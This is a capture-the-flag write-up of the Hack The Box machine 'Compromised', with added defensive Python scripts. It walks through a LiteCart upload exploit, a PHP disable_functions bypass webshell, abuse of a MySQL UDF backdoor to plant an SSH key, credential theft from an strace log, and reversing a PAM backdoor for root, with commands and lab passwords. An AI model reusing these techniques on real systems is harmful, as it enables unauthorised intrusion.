
Compromised is a Linux machine rated as difficult on Hack The Box. It consists of enumerating to find credentials for admin access; then, as lots of PHP functions are disabled, a PHP bypass exploit can be used to obtain a webshell. Next, looking for backdoors, MySQL can be used to obtain SSH access and then the sysadmin credentials. Finally, a PAM backdoor is found and, by reversing it, the root credentials are retrieved.
Enumeration
Running nmap:
```
nmap -sC -sV compromised.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Browsing to port 80 we find the following page:
Running gobuster to enumerate web directories we find a backup dir containing a copy of the page source:
```
gobuster dir -u http://compromised.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/shop (Status: 301)
/backup (Status: 301)
/server-status (Status: 403)
```
Enumerating the backup of the site, I decided to grep inside the admin directory to see if there were any passwords:
```
noxious@kali:~/Desktop/Vms/HTB/Compromised/shop/admin$ grep -ir "passwd" --color=always
login.php: //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
```
Then this file stood out: it wasn't inside the backup of the site, but accessing it through the web revealed the admin credentials:
Exploitation
After logging in as admin, it was discovered that the site was running LiteCart 2.1.2, for which an arbitrary file upload exploit was available:
https://www.exploit-db.com/exploits/45267
Running the exploit:
```
python litecart.py -t http://compromised.htb/shop/admin/ -u 'admin' -p 'theNextGenSt0r3!~'
Shell => http://compromised.htb/shop/admin/../vqmod/xml/GVYL1.php?c=id
```
But when I tried to use that webshell I found out that it didn’t work, so I modified the exploit code to run a phpinfo(), discovering that there were several php functions disabled.
Most of these functions are the ones used to obtain a webshell; therefore, knowing the PHP version, I searched for an exploit that bypassed the disabled functions:
https://packetstormsecurity.com/files/154728/PHP-7.3-disable_functions-Bypass.html
Then we needed to modify the code to get a webshell:
```
pwn($_GET['c']);
```
Next, we started Burp Suite to upload the exploit at the following URL: http://compromised.htb/shop/admin/?app=vqmods&doc=vqmods
Modifying the Content-Type to XML was enough to bypass the filter and upload the file:
Finally, we can use webwrap to obtain an interactive webshell:
```
rlwrap python3 webwrap.py http://compromised.htb/shop/vqmod/xml/sh.php?c=WRAP
www-data@compromised:/var/www/html/shop/vqmod/xml$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Now we need to enumerate the machine in order to find some information that can lead us to obtain user access.
First, by reading /etc/passwd I noticed that the mysql user had /bin/bash as its shell; following the machine's name, this might be a hint that this service has some kind of backdoor:
```
www-data@compromised:/var/www/html/shop/vqmod/xml$ cat /etc/passwd
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
```
Afterwards, a config file containing database credentials was discovered:
```
www-data@compromised:/var/www/html/shop/includes$ cat config.inc.php
// Database
define('DB_TYPE', 'mysql');
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'changethis');
define('DB_DATABASE', 'ecom');
define('DB_TABLE_PREFIX', 'lc_');
define('DB_CONNECTION_CHARSET', 'utf8');
define('DB_PERSISTENT_CONNECTIONS', 'false');
```
Investigating MySQL backdoors and exploits, I came across this [article](https://recipeforroot.com/mysql-to-system-root/), which pointed me to where to look: the `func` table of the `mysql` database lists the user-defined functions (UDFs) loaded from shared libraries.
```
www-data@compromised:/var/www/html/shop/includes$ mysql -u root --password=changethis -e "use mysql; select * from func"
mysql: [Warning] Using a password on the command line interface can be insecure.
name ret dl type
exec_cmd 0 libmysql.so function
```
Then we could use this exec_cmd function to execute commands as the mysql user:
```
mysql -u root --password=changethis -e "select exec_cmd('id')"
mysql: [Warning] Using a password on the command line interface can be insecure.
exec_cmd('id')
uid=111(mysql) gid=113(mysql) groups=113(mysql)
```
Next, as the SSH service was open, I decided to write my public key into the mysql user's authorized_keys:
```
mysql -u root --password=changethis -e "select exec_cmd('echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFuyPr4RFVPtUVBstN9/BoYQemup/I2VkSHV2lw8ul+d noxious@kali > ~/.ssh/authorized_keys')"
```
Then we could just SSH in as the mysql user:
```
ssh mysql@compromised.htb
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
```
Enumerating files, strace-log.dat caught my attention; grepping for passwords, there was an interesting finding from mysql:
```
mysql@compromised:~$ cat strace-log.dat | grep password
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */)
```
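A credential passed on a command line ends up in every process-execution trace that records argv, which is exactly how it leaked here. As an added example (not part of the original write-up), the script below parses `execve` lines in strace's format, flags invocations whose arguments carry a password, and returns a redacted copy of argv so that the finding itself can be logged safely. The sample log is constructed: the mysql line is the one quoted above, the other two lines are made up; `GLUED_P_CLIENTS` and the regexes are assumptions of this example, not part of strace or MySQL.

```python
import json
import os
import re

# Constructed lines in the shape of `strace -f -tt -e trace=execve` output.
# The mysql line is the one quoted in the write-up; the others are made up.
SAMPLE_LOG = """\
22225 03:11:08 execve("/bin/ls", ["ls", "-la", "/var/lib/mysql"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
22230 03:11:12 execve("/usr/bin/mysqldump", ["mysqldump", "-u", "root", "-pS3cret", "ecom"], 0x55bc62467900 /* 21 vars */) = 0
"""

# pid, timestamp, binary path and the quoted argv list of an execve line.
EXECVE_RE = re.compile(
    r'^(?P<pid>\d+)\s+(?P<time>\S+)\s+execve\("(?P<path>[^"]+)",\s*(?P<argv>\[.*?\]),'
)
# Long-form options that carry a secret in the same argument (assumption of this example).
LONG_SECRET_RE = re.compile(r"^(--?(?:pass(?:word)?|pw))=(.*)$", re.IGNORECASE)
# Clients that accept the password glued to -p, e.g. "-pSecret" (MySQL/MariaDB tools).
GLUED_P_CLIENTS = {"mysql", "mysqldump", "mysqladmin"}


def parse_execve(line):
    """Return (pid, time, path, argv) for an execve line, or None if it is not one."""
    m = EXECVE_RE.match(line)
    if not m:
        return None
    try:
        # strace prints argv as a list of double-quoted strings, which JSON parses
        # for the plain-ASCII case; lines with C-style \x escapes are skipped.
        argv = json.loads(m.group("argv"))
    except json.JSONDecodeError:
        return None
    return int(m.group("pid")), m.group("time"), m.group("path"), argv


def redact_secrets(path, argv):
    """Return (leaked, redacted_argv): leaked is True when an argument carried a
    credential, and the secret portion of that argument is replaced by ***."""
    leaked = False
    out = []
    basename = os.path.basename(path)
    for arg in argv:
        m = LONG_SECRET_RE.match(arg)
        if m and m.group(2):
            leaked = True
            out.append(f"{m.group(1)}=***")
        elif basename in GLUED_P_CLIENTS and arg.startswith("-p") and len(arg) > 2:
            leaked = True
            out.append("-p***")
        else:
            out.append(arg)
    return leaked, out


def scan_strace(text):
    """Return one finding per execve whose argv exposed a credential."""
    findings = []
    for line in text.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        pid, when, path, argv = parsed
        leaked, redacted = redact_secrets(path, argv)
        if leaked:
            findings.append({"pid": pid, "time": when, "path": path, "argv": redacted})
    return findings


if __name__ == "__main__":
    for f in scan_strace(SAMPLE_LOG):
        print(f"{f['time']} pid={f['pid']} {f['path']} {' '.join(f['argv'])}")
```

The same check applies to auditd `EXECVE` records and to shell history files; the mitigation on the MySQL side is a `~/.my.cnf` with restrictive permissions or `--login-path`, so that the password never appears in argv.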
Then, I tried this password to see if I was able to switch user to sysadmin, which was successful:
```
mysql@compromised:~$ su sysadmin
sysadmin@compromised:/var/lib/mysql$ id
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin)
```
Privilege Escalation
After some time enumerating without finding anything useful, I decided to follow the machine's theme and look for backdoors, so, searching for recently modified files, I came across the following output:
```
sysadmin@compromised:/lib$ find . -mtime -24
.
./x86_64-linux-gnu/security
./x86_64-linux-gnu/security/.pam_unix.so
./x86_64-linux-gnu/security/pam_unix.so
./systemd/system
./udev
./udev/rules.d
./ifupdown
```
Looking for a PAM backdoor, I found one on GitHub that produces the same file:
https://github.com/zephrax/linux-pam-backdoor
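Modification time is a weak signal (it is trivially reset), so the check a defender would actually run is to compare the installed module against the hashes the package manager recorded at install time, and to look for files in the module directory that no package accounts for. The script below is an added example, not part of the write-up or of any tool it references: it reads a manifest in the format of dpkg's `/var/lib/dpkg/info/<package>.md5sums` files and checks a directory tree against it. The manifest, the module bytes and the directory tree are all constructed inside a temporary directory so the example runs offline; `SECURITY_DIR` and the function names are assumptions of this example.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed stand-in for the module bytes the package originally installed.
# The manifest is built from it in the md5sums format dpkg uses:
# "<md5><two spaces><path without leading slash>".
PRISTINE_MODULE = b"\x7fELF constructed stand-in for the packaged pam_unix.so"
SECURITY_DIR = "lib/x86_64-linux-gnu/security"
MANIFEST = (
    f"{hashlib.md5(PRISTINE_MODULE).hexdigest()}  "
    f"{SECURITY_DIR}/pam_unix.so\n"
)


def parse_md5sums(text):
    """Map each packaged path to the MD5 digest recorded for it."""
    entries = {}
    for line in text.splitlines():
        if line.strip():
            digest, path = line.split(None, 1)
            entries[path.strip()] = digest.lower()
    return entries


def verify_package_files(manifest_text, root):
    """Return {path: 'ok' | 'modified' | 'missing'} for every manifest entry,
    hashing the file found under root (pass "/" on a live system)."""
    results = {}
    for rel, expected in parse_md5sums(manifest_text).items():
        target = Path(root) / rel
        if not target.is_file():
            results[rel] = "missing"
            continue
        actual = hashlib.md5(target.read_bytes()).hexdigest()
        results[rel] = "ok" if actual == expected else "modified"
    return results


def find_unpackaged_files(manifest_text, root, subdir):
    """List files under subdir that no manifest entry claims. A dotfile dropped
    next to a PAM module is exactly what this surfaces; pathlib globbing does
    not skip hidden names the way a shell glob does."""
    claimed = set(parse_md5sums(manifest_text))
    base = Path(root) / subdir
    return sorted(
        p.relative_to(root).as_posix()
        for p in base.rglob("*")
        if p.is_file() and p.relative_to(root).as_posix() not in claimed
    )


def demo():
    """Build a constructed root holding a tampered module plus an unlisted
    sibling file, and run both checks against it."""
    with tempfile.TemporaryDirectory() as root:
        sec = Path(root) / SECURITY_DIR
        sec.mkdir(parents=True)
        (sec / "pam_unix.so").write_bytes(b"\x7fELF constructed tampered module")
        (sec / ".pam_unix.so").write_bytes(b"constructed unlisted sibling file")
        return (
            verify_package_files(MANIFEST, root),
            find_unpackaged_files(MANIFEST, root, SECURITY_DIR),
        )


if __name__ == "__main__":
    status, extras = demo()
    for path, state in status.items():
        print(f"{state:9} {path}")
    for path in extras:
        print(f"unlisted  {path}")
```

On a real Debian or Ubuntu host the same comparison is what `dpkg --verify libpam-modules` and `debsums` perform; the hashes they rely on live on the same disk as the module, so a tamper-evident copy of them (or a file-integrity tool with an off-host baseline) is what makes the check trustworthy after a compromise.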
So I decided to transfer this file to my machine using scp:
```
scp sysadmin@compromised.htb:/lib/x86_64-linux-gnu/security/pam_unix.so Desktop/pam_unix.so
```
Once I had this file on my machine, I opened it with Ghidra in order to see if I could find the password used.
Decompiling the functions, there were two hex constants inside pam_sm_authenticate assigned to the variable backdoor:
Converting these two constants to little-endian byte order and appending them, we get the following hex string:
```
7a6c6b657e5533456e7638326d322d
```
Decoding it we obtain the root password:
```
echo "7a6c6b657e5533456e7638326d322d" | xxd -r -p
zlke~U3Env82m2-
```
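When a compiler stores a short string with 8-byte MOV instructions, the decompiler shows each chunk as a 64-bit immediate whose printed hex is the reverse of the byte order in memory, which is why the two constants had to be byte-swapped before decoding. The block below is an added example (not the write-up's code and not Ghidra output) that performs that conversion for any number of constants and also runs it in reverse, so a recovered string can be checked against the constants. The two immediates are constructed from the hex string recovered above, not copied from the decompiler.

```python
# Two 64-bit immediates in the form a decompiler shows when a 15-character
# C string (plus its NUL) is assembled with two 8-byte stores. Constructed
# from the hex string in the write-up, not taken from Ghidra's output.
BACKDOOR_IMMEDIATES = (0x4533557E656B6C7A, 0x002D326D3238766E)


def immediates_to_bytes(values, width=8):
    """Lay each constant out in little-endian order (how x86-64 stores it in
    memory), concatenate, and stop at the first NUL, which ends the C string."""
    raw = b"".join(v.to_bytes(width, "little") for v in values)
    return raw.split(b"\x00", 1)[0]


def recover_string(values, width=8):
    """Decode the recovered bytes as the ASCII credential the module compares against."""
    return immediates_to_bytes(values, width).decode("ascii")


def string_to_immediates(text, width=8):
    """Inverse direction, useful for confirming a guess: pack a C string (with
    its terminating NUL) into width-byte little-endian constants."""
    data = text.encode("ascii") + b"\x00"
    data += b"\x00" * (-len(data) % width)  # pad to a whole number of constants
    return tuple(
        int.from_bytes(data[i:i + width], "little")
        for i in range(0, len(data), width)
    )


if __name__ == "__main__":
    print(immediates_to_bytes(BACKDOOR_IMMEDIATES).hex())
    print(recover_string(BACKDOOR_IMMEDIATES))
    print([hex(v) for v in string_to_immediates("zlke~U3Env82m2-")])
```

Passing `width=4` handles the 32-bit case, where the same string shows up as four or more `DWORD` constants. Finding a hard-coded comparison of this kind inside `pam_sm_authenticate` is itself the indicator: the genuine pam_unix.so has no embedded password and only ever checks against the hashes in /etc/shadow.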
Finally, we can just access the root account:
```
sysadmin@compromised:/lib$ su root
Password:
root@compromised:/lib# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:/lib# whoami
root
```